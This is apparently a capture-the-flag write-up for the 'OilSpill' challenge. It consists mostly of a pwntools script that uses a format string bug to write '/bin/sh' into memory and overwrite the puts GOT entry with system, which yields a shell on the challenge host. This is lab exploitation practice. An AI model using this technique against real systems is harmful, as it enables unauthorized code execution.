Rating:

Format string exploit. Overwritte `puts` with `system` and the data used by `puts` pointer with `/bin/sh` no leaked needed due to program leak

```python
3 │ from pwn import *
4 │
5 │ elf = ELF("./OilSpill_patched")
6 │ context.binary = elf
7 │ rop = ROP(elf)
8 │
9 │ gs = '''
10 │ continue
11 │ '''
12 │
13 │ #context.log_level = "debug"
14 │
15 │ def conn():
16 │ global libc
17 │ if args.REMOTE:
18 │ libc = ELF("libc6_2.27-3ubuntu1.5_amd64.so")
19 │ r = remote("oil.sdc.tf", 1337)
20 │ else:
21 │ libc = ELF("/usr/lib/libc.so.6")
22 │
23 │ r = process([elf.path])
24 │ if args.GDB:
25 │ return gdb.debug(elf.path, gdbscript=gs)
26 │ return r
27 │
28 │ def send_payload(payload):
29 │ p.sendline(payload)
30 │
31 │ p = conn()
32 │
33 │ addresses = p.recvline()[:-1].split(b",")
34 │
35 │ printf = int(addresses[1], 16)
36 │ puts = int(addresses[0], 16)
37 │ info(f"Leaked printf @ {hex(printf)}")
38 │ info(f"Leaked puts @ {hex(puts)}")
39 │ libc.address = printf - libc.sym.printf
40 │ info(f"Leaked libc.address @ {hex(libc.address)}")
41 │
42 │ format_string = FmtStr(execute_fmt=send_payload, offset=8)
43 │ format_string.write(0x600c80, b"/bin/sh\0")
44 │ format_string.write(elf.got.puts, libc.sym.system)
45 │ format_string.execute_writes()
47 │ p.interactive()
```